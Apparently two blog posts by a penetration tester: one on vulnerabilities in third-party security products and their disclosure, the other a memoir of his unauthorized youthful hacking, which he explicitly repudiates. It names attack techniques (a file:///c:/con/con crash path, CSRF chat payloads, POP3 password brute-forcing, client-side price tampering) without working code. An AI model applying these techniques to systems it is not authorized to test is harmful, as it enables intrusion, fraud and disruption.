I work for a very reputable security company and we collectively decided the right thing to do here was to responsibly disclose the findings (a second time) to the new FireEye executive team.  They were thankful for the findings and handled the situation well, even rewarding me with CVE's for a few of the findings that hadn't previously been reported by that time.

Third Party Software
  • Adobe RoboHelp Server
Here's another example of how third party software or hardware can introduce vulnerabilities into your network.  I was doing a penetration test for a client whom I admire for really being on top of their patch management program.  They do an superb job of patching not just operating systems, but third party applications in both Windows and Linux environments, which is such a beautiful thing to see.  In fact, their vulnerability assessments are essentially squeaky clean, except for the unavoidable occasional new vulnerability that comes out between patch cycles.

This is also a client we've done quarterly tests for for a couple of years now.  As a penetration tester, from my perspective, I was happy for the client but was frustrated by how difficult it was to find an exploitable vulnerability I could leverage from the outside to gain Internal access the their environment.  I decided my time would be best spent thinking outside of the box and really doing some fuzzing against the external services that were available, specifically web services.

One of these web services was an application called Adobe RoboHelp.  I hadn't heard of it so I started poking around and diving deep within the logic.  I manually altered parameters and would use Burp Suite to actively and passively test the new responses until finally, I found some unauthenticated SQL Injection.  This was an externally facing web service and most RobotHelp instances are, because the purpose is to offer support and how-to articles to end users who visit the site.

Needless to say, with SQL Injection there's an opportunity to access sensitive data and even potentially execute arbitrary code on the OS.  Because of this critical issue introduced by a trusted third party, an organization's otherwise secure environment is now vulnerable to a breach.  I contacted Adobe's response team, who were a pleasure to work with, as they created a patch for the issue.  They also awarded me with a CVE!  I then communicated with my client to make sure they were aware of the patch and tested again to ensure the issue was properly mitigated.


In the past as a penetration tester I naturally migrated to custom developed applications, assuming the road less traveled was where I would find my exploitable bugs.  As a System's Administrator I've assumed a well known vendor's product, especially a Cyber Security one, would be safe to trust.  I've assumed their products have gone through rounds of testing and they follow best practices when developing code.  These two incidents, in addition to a handful of others, have really swayed my thought process from a blue team and red team perspective.

The threat of insecure devices on our networks is greater than ever due to the rise in IoT devices, which are popular in both consumer and enterprise environments.  Just type, "Internet of Things Security" into Google for countless examples of how devices were left open to the Internet with default credentials or other major holes which give attackers a foothold.  A lack of IoT security and infected devices is why I created Digifense all of those years ago, although I no longer maintain it.

My advice to my readers is to simply challenge your vendors, as their customer or potential customer, to share the results of their security tests.  Make sure they were performed recently and regularly, and it's done by a third party.  Are they patching their products and dependencies regularly?  I also encourage all of you to independently test each new device and application prior to placing it on your network, as you would with any untrusted introduction to your environment.  And yes, they should earn your trust by a history of good practices.

If you have an internal security team, what better way to build skills and safely practice testing than against a new product in an isolated VLAN?  If you're adding the newest smart gadget to your home, inspect the network traffic to see if it's encrypted and who or where it's phoning home to.  I do this with an OpenWRT router and tshark.  You can also use a tool like IoT Inspector.  Consider putting IoT gadgets in their own VLAN or guest WiFi network in case they get compromised.  

Lastly, make sure your security vendors practice what they preach.  I wouldn't want to hire someone to protect me if they're not capable of protecting their own product or company.  Have they been involved in breaches?  See if the vendor has a reputation for bad security practices before you buy.  Are they the Titanic, promising to be un-sinkhackable?


My intent with this blog certainly isn't to try and use scare tactics and stir up paranoia, but instead to share my experiences and hopefully allow you to challenge every device or application you deploy into your trusted environment.  Many providers do the right thing and they "eat their own dog food", while others do not, or haven't always.  As security professionals we are trusted to keep the bad guys out, so the last thing we want to do is unintentionally make the environment less secure by introducing a trojan horse dressed like the next security silver-bullet.  

If you liked this blog or you hate it with all of your soul, please let me know and why!  I would love to get feedback on what is and isn't valuable to my readers!

- Curtis Brazzell

April 21, 2019

From Grey to White - An Unspoken Ethical Journey in Cyber Security


I write this blog entry at the risk of tarnishing my personal and professional reputation.  I do so in hopes that it will help others who are starting out in this industry or those who are still in the grey zone know that this is likely a familiar path for a lot of us "professionals" in this space.  We don't speak of it, often times because of the ethical oaths we've taken in order to obtain our professional certifications or positions in law enforcement, etc.  It's also something I think we've put behind us, even though it's an important part of who we are.  Even though a Black Hat is something I never have considered, I'd be lying if I said I was always the White Hat I am today.  One of the pillars of these professional certifications is "Truth" and "Honesty", so pretending my past was always without blemish and perfectly ethical would be a direct violation of this.  

I want to tell my story because it's part of who I am, and I hope it encourages others who may be in this area of their lives to know that many of us (now) White Hats started out in much the same way.  Many of us have turned a passion into a career that is rewarding, but if we're honest with ourselves, we're still "hackers" at heart.

UPDATE : Ironically, as I finished writing this, current events around Marcus "MalwareTech" Hutchins have stirred a debate in the Cyber Security community on this very topic.

My Story

circa 1993

The year was 1993 and I was in entering the 4th grade.  Our 14 person elementary class (93 in the entire school) was lucky enough to receive a grant allowing us to take home our very own personal computers.  Mine was an original Macintosh (old by then), which I quickly became obsessed with.  We eventually upgraded to newer models.  All of the students along with their families met after school one evening and we were taught how to plug everything in so we knew what to do when we got home.  We also had external dial-up modems we could use for faxing and "electronic mail".  I took it upon myself to remember every cord and every physical component on the machine.  I think I took some pride in knowing just as much as the adults in the room at the time, since we were all new to this.  I can thank this very moment for what set everything in motion for my career today, that same drive and passion fuels me even now.

"Former Indiana School Superintendent H. Dean Evans helped formulate the Buddy project during his eight-year tenure that began in 1985.  Evans said his original hope was to have a computer in the home of every child from kindergarten through high school.  He sees a time when elementary school children will use computers as spontaneously as they now use pencils and crayons."  Thanks, Mr Evans!  We'll throw modern phones in as computers too and.. what are pencils?


Fast forward to 1996.  The movie, "Hackers" just came out within the last year, but I won't end up watching it for another decade or so.  I'm eleven years old and I love my Mac but felt like I had done just about everything I could imagine on the thing.  I was itching for more.  My dad was awesome enough to recognize my drive and had the foresight for the technology boom in the future so he bought the family a Compaq Presario PC with Windows 95 and America Online on it.  Don't forget about Encarta!  Now we were cooking with gas!

Our $2,500-ish 233Mhz PC

Needless to say, for the next few years I became completely obsessed with this machine and everything it had to offer.  I was "viewing source" on websites I admired and memorizing HTML to build my own web pages.  Like everyone else at the time I was heads down in IRC and AOL Instant Messenger (AIM) and I was playing video games like Duke Nukem 3D, Doom, Flight Simulator 95, Jedi Knight Dark Forces, and others.  I learned how to create "hacks" for Jedi Knight DF2 and would have fun playing multiplayer games with those advantages.  I created a player editor for that game as well in Visual Basic.  As I started to program I enjoyed making my own RPG games and I was just getting into building my own computers from extra parts.  Search engines were pretty terrible at this point so I was self taught, mostly because I would break the computer every-possible-way and would be afraid of getting in trouble by my dad so I'd have to fix it.  I did end up making my own meta-search engine to combine results from the greats (AltaVista, Ask Jeeves, Lycos, Yahoo, etc).  This was back when results were less about reliability and more about quantity.

I learned a lot about file systems, registry settings, partitions, how to format and restore an OS, drivers, you name it.  It's embarrassing to admit now but I used to lay awake at night staring at the LEDs on my desktop and hoping I could absorb some of it's knowledge, through osmosis or something.. I would fantasize about being on a competitive panel of "experts" one day and being able to answer every computer question that was thrown out.  Other kids were being eleven-year-olds.  

I'll try to move along, my nostalgia isn't going to rub off on all of you readers who are surely getting bored by now unless you can relate to this time.  I know many got started much earlier or even later in their careers, so let's jump forward to 1998 when "Security" became my new obsession.


A little backstory, I grew up in a small farm town where most other peers were into agriculture and I was the lone one into technology.  I actually somehow managed to get an "F" (my only F in HS) in Agriculture class.  As people started to get into computers around me, our small town would often call and pay me to "fix" their computer problems as I developed a reputation as the local help desk kid.  As a thirteen year old I pretty much knew the ins and outs of Windows 95 and now Windows 98.  Looking back, it seemed everything was a driver or hardware issue!  I spent most of my days on the computer, so much so that I'd often forget to eat meals and my parents would eventually "ground" me from the computer so I would be forced to leave the house and socialize with other kids.  Again, shout out to my parents or I may have wound up so introverted I couldn't communicate like I can today with both technical and non-technical peers.  

One day my dad was talking about this annoying new policy at work where if he doesn't move his mouse for a while the screen will "require him to log in again".  I realized this was a lockout policy and was for security reasons, but I was determined to help get him around this.  Windows 98 at the time had something called Active Desktop, which essentially were HTML web pages that could be used as a desktop wallpaper background.  I had an idea to create an iframe or JavaScript or something that would refresh on a certain interval to make it look as if the computer was actively in use, preventing the lockout from occurring.  My dad thought this was the greatest, but ironically it goes against the very advice I give now a security consultant.

Anyways, the real reason we're visiting 1998.. crashme.com is now a thing, and I heard about it from other kids in my Jr High school who had computers.  There was a pretty small group of us and we were super nerdy, as you can imagine.  This was a site which contained some Windows 95 and Windows 98 Denial of Service (DoS) vulnerabilities that would crash the OS, regardless of which browser you were using (choose between Netscape Navigator or Internet Explorer, yay!).  When I say "crash", I meant your PC instantly got the infamous "Blue Screen of Death" or BSOD by simply visiting the site, and the only way around it was to flick the I/O button and physically turn off your PC.  

As soon as my speedy 28.8kbps modem rendered the site, my face lit up with awe and excitement when my new blue wallpaper greeted me.  How in the world was this working?!  How can I bottle this up and re-use it?  I can't "view source" because by the time I get to the site my PC will crash.  I had an idea, I'd grab the contents of the site from my "Temporary Internet Files" directory which cached the contents of the site locally.  Success!  I could now see what the code was trying to do.  This exploit was pre-Common Vulnerabilities and Exposures (CVE), so it was simply known as the c:/con/con or "con con" vulnerability.  

crashme.com code, thanks to the way back machine!

For those that aren't familiar, Ars Technica describes it well.  "The Windows 9x-era bug was due to an error in the way that operating systems handled special filenames. Windows has a number of filenames that are "special" because they don't correspond to any actual file; instead, they represent hardware devices. These special filenames can be accessed from any location in the file system, even though they don't exist on-disk.

While any of these special filenames would have worked, the most common one used to crash old Windows machines was con, a special filename that represents the physical console: the keyboard (for input) and the screen (for output). Windows correctly handled simple attempts to access the con device, but a filename included two references to the special device—for example, c:\con\con—then Windows would crash. If that file was referenced from a webpage, for example, by trying to load an image from file:///c:/con/con then the machine would crash whenever the malicious page was accessed."

Remember too, this was 1998 and people didn't patch Windows like they do (or don't do) today, so almost everyone was vulnerable for several years.  It's about this time in my life I enter the fitting room known as my bedroom and try on the super alluring grey hat.


Around this time my best friend was really into a virtual chat environment who, you guessed it, was one of my computer buddies in Junior High.  He played this thing all the time and took it super seriously.  You know, like how people are into World of Warcraft.  Is that what kids are into nowadays?  Did I mention I'm old?  Anyway, he talked me into joining and I realized there were tons of people on this thing and it allowed for unfiltered HTML in the public and private chat rooms.  I think you know where this is going..

I realized I could "weaponize" this code with a simple image tag in a chat room and I'd see people drop like flies from the channels.  I could also DM people directly and target them to crash.  I got a super sick rush from this and thought it was pretty much the coolest thing in the universe at the time.  I didn't think about how I was potentially making people lose their saved work, but I thought it was pretty harmless since it shouldn't damage any equipment.

This led me down another path, since I realized HTML could be rendered in direct messages.  I thought, "Well what happens if I create some JavaScript that causes a recipient to make a call to a resource I don't have access to?"  For example, could I send a message to someone which then causes them to message someone else?  This was a beginning of an obsession of mine dealing with Cross-Site Scripting (XSS) and Cross Site Request Forgery (CSRF) before I knew they had names.  I realized through trial and error that for another URL to be called successfully, it had to be URL encoded, but I didn't know what this was at the time.  I just knew certain characters wouldn't work in my payload unless they were "converted" (encoded) to a hex equivalent.  I ended up making my own URL Encoder tool and pretty soon I was terrorizing the virtual town.  

I created payloads that would use CSRF against privileged moderators in the channels and the payload would cause them to delete other user's virtual houses or give me virtual currency in the game.  One of my attacks I tested against my good friend which was designed to message an Operator from his account, which then cursed them out and taunted them to ban him.  I thought this was so cool and couldn't wait to hear from my friend if it worked, my only way to verify the attack, until he called me up and was understandably upset.  I had forgotten how important this was to him and I just got him banned for life under his account.  He rightfully didn't talk to me for a month or so afterwards.  Let this be lesson one for me going down the "dark side" of Information Security.  It wasn't as cool for the victims as I thought it was for me at the time.

I then decided to get out of CyberTown and give up being a nuisance.  I friended a stranger in a chat and told him about my "abilities" which he was very interested in.  I shared my payloads with him (another bad idea) and went on my way.  I later saw in the news (from CyberTown's own site) that someone was going to be prosecuted for "hacking" CyberTown and based on the description of the attacks, couldn't help but wonder if it was the same guy.  A close call?  I remember times when the doorbell would ring and I'd be afraid the FBI was at the door, no joke.

Trouble at School #1

Back in the day, emails with embedded HTML just rendered fully in the client by default.  As a time reference in history about now, the ILOVEYOU worm is all over the media.  I'm now a freshmen in High School and we had our very own network administrator.  She was a kind lady, but I saw her as a technical opponent at the time for whatever reason.  I guess being a teenager I was just stupid and thought I needed to demonstrate just how much smarter I thought I was than her.  I was known as one of the "nice kids" who never saw the principals office and never got into trouble or created attention for myself.  I had the ill-conceived idea to generate an email that just simply showed a green smiley face I created with an embedded wav file maniacally laughing (something to the tune of "MWUAHAHAHAHA..").  I figured the last thing she would see was this before her computer blue-screened.

Being young and dumb, I crafted the email and modified my "sender" address to something made up so I wouldn't be recognized.  I looked it over and without a second though and only a smile, I sent it on.  I got that same rush after it sent.. I knew when she opened it her computer would crash and she wouldn't know who sent it.

The next day I'm sitting in a humanities class when all of a sudden our lesson is interrupted by an office assistant.  She's holding a pink slip in her hand and my stomach suddenly felt queasy.  I knew at that moment she was there for me, and, sure enough she was.  As she announced my name, it's like every head in the class turned to look directly at me and I heard people whispering, "What did he do?".  

As I'm walking to the office all I can think about is how they caught me.  Were her skills superior to mine?  Did she have some advanced way of tracking down the origins of my image or email in some way?  Instead of feeling bad about the attack, I was focused on the technical.

The reality of the situation hit when I entered the office and I saw the disappointed facial expression of the network administrator, the victim of my attack.  I instantly felt awful seeing a person on the other end of this instead of a recipient address.  Like my friend, I got the impression it wasn't just a "cool prank" to her either.  We went in her office, and she was unbelievably gracious to me.  She asked me why I did it and I didn't have a good answer for her.  I told her I liked her.  She was nice enough to tell me to keep my voice down so the principal didn't her us, she was trying to protect me!  She said something like, "Look, I know you can probably do circles around me on a computer but you should put your skills to good use instead of bad.  Also, my computer froze when I opened your email and I was afraid to turn it off so it laughed loudly all night.  My husband and I didn't get any sleep.  Do I have a virus?".  To which I replied, "Oh no nothing like that.  It's just a harmless prank that causes you to force shut off your computer.  No damage should have been done to your files and I didn't expect it to laugh like that on an endless loop.. so...sorry about that!  Oh, by the way, how did you know it was me?".

She explained that my full name was simply at the bottom of the body in the email.  Are you kidding me?!?  I should have known that the email client I was using auto-inserted a signature with my fully registered name (silly me) so even though I had taken the time to mask my sender address it was all for nothing.  DOH!  Let this be lesson two!

Trouble at School #2

I think I'm a Junior in high school at this point.  I've poked around at home on my Internet connection and discovered a POP mail server hosted by my school.  Because the email naming convention was simple, I generated a quick list of all teacher's email addresses.  I didn't have their passwords, but I figured I could bruteforce them over a POP3 connection quickly enough.  I used a tool called Brutus (et tu brute) that would do exactly this for me against a wordlist of user accounts.  I fired it up one night and went to bed.  When I woke up, I was shocked to see it had successfully cracked about 90% of the passwords!  I didn't expect this, but soon saw that a majority of the credentials were the original default of "hawks".  Our mascot was "The Blackhawks" so..  Anyways, I recall funny ones too like the biology teacher's being "froggy" and the math teacher's being "median" or something silly.  No one used caps, numerics, special characters, or a length of over 6 or 7 characters.

I really didn't expect this to be successful.  I didn't think I'd get anyone's password, let alone nearly all of them.  My first thought was, I need to do the right thing this time around and report this.  But first.. I need to look at a couple of inboxes.  You know, to make sure they're uh.. legitimate?  So I looked at my Math teacher's email and bragged about it the next day.  I tried my hardest to resist the temptation to look at anyone else's.  It felt wrong, but I got that same thrill of gaining unauthorized access from the comfort of my home PC.  I stored the plaintext usernames and passwords in a text file called something obvious like, "My_Teachers_Weak_Passwords.txt" and stored them where I stored everything at that time, my Angelfire web directory!  I didn't want to lose what I had so I figured that was a good a place as any!  It had directory indexing enabled so I could easily see all of my files from anywhere if I needed them.  (pre-cloud, same concept)

At some point I got contacted on my Angelfire email account by an educator at another school, saying they somehow came across my file and encouraged me (felt like a threat) to take it down and self-report the incident.  I explained that I had planned to, but conveniently left out the part about the account access.  Anyways, I went about it completely the wrong way by just walking in the principal's office one day and saying something like, "You all should change your passwords, because they're terrible.".  For some reason they didn't respond well to this.  😲  In my mind I was self-reporting and doing the right thing, but failed to see how this freaked them out at the time.  

They didn't know what to do with me, I was their first "hacking" case.  They wanted to make an example of me but they also had a difficult time understanding the scope of what had been done.  They ended up suspending me for a day and required me to go to a therapist because they decided after the first incident I had an "irresistible urge to hack".  Long story short I went, the therapist was confused as to why I was there, diagnosed me with A.D.D. and sent me on my way.

Trouble at School #3 & #4

I won't waste a lot of time explaining these.  Basically, at this point I had a reputation among the faculty and the other students.  The nickname friends called me was, "Hack".  I didn't like it, but it wasn't meant to be an insult either.  My first computer class was a web design class in 2000 which was run by the PE teacher and he used a Web Development for Dummies book as the curriculum.  No joke!  It was hard to sit through with my experience, so I cloned a fake Ask Jeeves (I was just beginning to be a Google fan) search engine portal and made it respond with a silly answer, no matter what you asked it.  Kind of like what Ask Jeeves did by default, now that I think about it!  My friends and I would call the teacher over and ask why our search wasn't working and get a laugh out of how dumbfounded he was by the whole thing.  Yeah, I was that annoying brat kid when it came to computers.  Anyway, there were two additional incidents that got me sent back to the office.  One time was innocent. I was troubleshooting a DNS issue locally and when the teacher saw the Windows Command Prompt open he instantly thought of the Hollywood movies and deduced I had to be hacking again.  I explained myself to the office staff, but this time I was crying wolf.

The second time in this same class, I realized my workstation was logged in still as an Administrator so I used my new privileges to install a game (Jedi Knight Dark Forces II) on the network share so my friends and I could play multiplayer games instead of designing simple web pages.  I used up all of the free space on the drive, which I thought was allocated for just me.. but instead it was for the entire school.  This caused a bit of a Denial of Service situation accidentally and it eventually got back to me.  This was the final straw for the school and I was banned from computer use for the rest of my high school career.  Little did they know, I was a library assistant so in my free time at the library I would continue to scrape local credentials and install annoying prank-ware like the one that makes your mouse jump all over the place, or the screensaver that looks like a BSOD.. those kind of pranks.  They also had software at that time to "lock down" the computers, so I saw it as a personal challenge to bypass those restrictions, which I had.


I didn't get in trouble for anything in college but I was far from ethical.  I would pirate software and learned how to use a debugger to reverse engineer (RE) the binaries to bypass the need for keys.  I didn't contribute any "cracks" to the community but I enjoyed making them for my own use.  This skill actually came in handy later in my career when reverse engineering malware samples and creating buffer overflows.

I figured out in college how to hack my original Xbox with only software mods, which wasn't something I came up with on my own.  I had followed some guides but I did find a unique way of efficiently cloning new systems in a relatively short amount of time.  To get everything the way I wanted it with roms and cloned games took me about a year.  I found I could replicate the entire process onto a new Xbox in under an hour.  Word got around somehow, and before I knew it I had a bit of an underground business.  Strangers would show up at my door, offer me some cash, and I'd spit out a hacked Xbox for them.  I didn't even advertise anything, it was simply word of mouth.  This would happen somewhat regularly for a while and my roommates were used to it.  I eventually shut this down but continued to mod just about every console I owned afterwards.

Other Memorable Events

Before my career in Cyber Security, I had done other things I was later not proud of.  I hacked into a few of my friend's AIM accounts and pretended to be them to other buddies, thinking it was funny.  When I turned 16 and had access to a laptop I would war drive, which I didn't know was a thing at the time.  One time I was with a buddy and he and I pulled up to his dad's business.  We sat in the parking lot and I showed him how easy it was to access his internal shared folders which contained sensitive documents.

I hacked all of my neighbor's WiFi passwords, especially the ones who had a default 2Wire gateway password of eleven numbers or which leveraged WEP.  I exploited SQL Injection on an e-commerce site and looked around before reporting it anonymously.  I found logic flaws in Marriott's WiFi registration pages which sent pricing information from the client-side, so it was trivial to make it cost $0.00.  I also lived across from a Marriott in an apartment, so with a Pringles cantenna and this I was set.  Similarly, another e-commerce site did this for product pricing, so I actually ordered something and made it cost a dollar only to feel guilt-stricken and cancel the order before it went through.  That was the first time it actually felt like I was going too far, my conscious wouldn't allow it.  However, I did exploit a flash-based "game" on a local car wash's website and created a script to win a free deluxe wash on demand.  I used this many times before it really hit me that what I was doing was also theft and then gave it up.  

Lastly, whenever I'd go somewhere that had a public terminal that was "locked down", I'd try all of the techniques I learned to try to escape the restrictions.  I did this at hotels, lobbies, anywhere there was public access.

Lessons Learned

At that early time in my life in high school, I looked at those events differently.  I viewed myself as a victim, that because of the school administration's ignorance of technology my "harmless snooping" was unjustly being made an example of.  I didn't take down anything or destroy property and I didn't steal anything, I argued that my unauthorized access was the equivalent of walking into the school after hours and simply looking around.  I've had a bad attitude about this event for years and even convinced friends and family along with myself that the school simply didn't understand. 

Let me be clear: I WAS WRONG

I did things without approval.  I created a situation in which people, even friends, no longer trusted me.  I scared the school administration and because this was new to them and they didn't have an "expert" on staff to help them handle the new risk I posed to them, they didn't know how to move forward.  They knew what I had done was wrong and they rightly wanted to prevent this from happening in the future.  Maybe the next person wouldn't simply view records, but change grades and bring down the network?  

Looking back now I would have received greater satisfaction by responsibly asking for permission and testing their deficiencies in order to report them, as I do today as part of my daily job responsibilities.  That rush of doing something I shouldn't and the fear of being caught which follows is nothing compared to the joy that I get from legally testing environments and in turn effectively communicating risk to those customers, to help them strengthen their defenses.  

I genuinely wanted the school to set up better passwords, but scaring them into doing so and violating their trust by accessing accounts I shouldn't have was not the right approach.  

Because of these events, I now have a spot on my record I'm otherwise proud of.  I take great pride in the quality of work I provide to clients and the ethical White Hat road I've stuck to since starting a career in Cyber Security ten years ago.  Don't get me wrong, there are times where I still really want to stick a single quote or an alert(1) in an input field on a site I'm not authorized to test, but I do my best to resist that temptation.

As ridiculous as the idea of therapy for a hacking addiction seems to me, there is a certain truth to the obsession and the difficulty in denying a temptation to test.  I can almost see how someone would become a black hat and internally justify their own actions.  Hacking may seem like a victim-less crime because you can't physically see or get to know the person on the other end of the wire.  

I think a healthy outlet for people in similar situations is to commit full time to the "light side".  Enter a job in Cyber Security as a penetration tester or red teamer, we could use you!  If that's not an option at the moment or it's not enough, there are bug bounty programs available where you're allowed to do testing and get paid to learn in the process!  There's also a plethora of free resources available online where you can test your skills in safe, sandboxed environments.  Capture the flags, intentionally vulnerable virtual machines (Metasploitable, etc), and web applications like DVWA/bWAPP or hackthebox are just a few worth mentioning.  It's certainly no excuse, but these options weren't available back when I started and the media almost seemed to encourage the idea of young hackers instead of condemning it.  It didn't help that Hollywood sensationalized it and still continues to do so today.  I also felt like I was taking this journey alone because that the time I didn't know of other people who were into this.  I certainly didn't think this could be a career if done legally.  I was completely ignorant of "hacker culture" then and as it exists today.

I'm not self-centered enough to think that this blog will turn away black hats that might read this, but I do hope it helps to make others in a similar grey situation as my younger self to think about their actions and to consider the alternative.  It might sound corny, but we have a responsibility to put our skills to good use and fight cyber crime.  We have a vested interest ourselves in making the Internet a safer place, not just for us, but for our friends and family as well.  This field is both financially and self rewarding when we work together collectively to contribute to the overall "health" of our online community.  I'd like to sincerely apologize to the InfoSec community and to the victims of my hacktivities.  I'd like to especially apologize to the Sheridan school system!  I hope this blog finds it's way to those affected individuals.

Thanks for listening to my story!  Please leave a comment if you agree, disagree, or just want to share a similar experience for other readers!  Also, I know what you're thinking and no, you can't have my killer sweater.

- Curtis Brazzell